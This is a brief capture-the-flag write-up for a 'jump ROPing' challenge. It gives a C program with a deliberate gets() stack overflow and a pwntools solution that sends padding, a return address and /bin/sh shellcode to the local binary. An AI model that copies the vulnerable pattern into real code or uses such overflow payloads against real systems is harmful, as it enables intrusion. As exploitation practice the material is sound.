THANK YOU CHRISTOS

#include <stdio.h>
#include <string.h>
int main(){
        printf("Do you like jump ROPing?\\n");
        vuln_func();
}
void vuln_func(){
        char input[16];
        gets(input);
        printf("I actually don't care about your opinions. Cry about it");

}
void win(){
        system("/bin/cat flag.txt");
}

Solution

from pwn import *
import struct

shellcode = b""
shellcode += b"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73"
shellcode += b"\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89"
shellcode += b"\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b"
shellcode += b"\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80"

#payload = b'A'*28 + b'\\x9b\\xfa\\x0c\\x08' + shellcode
payload = b'A'*28 + b'\\x07\\x98\\x04\\x08' + shellcode
p = process('./tc2')
#gdb.attach(p)
p.sendline(payload)
p.interactive()

The first payload fails because that rop gadget is in the .rodata (read only data)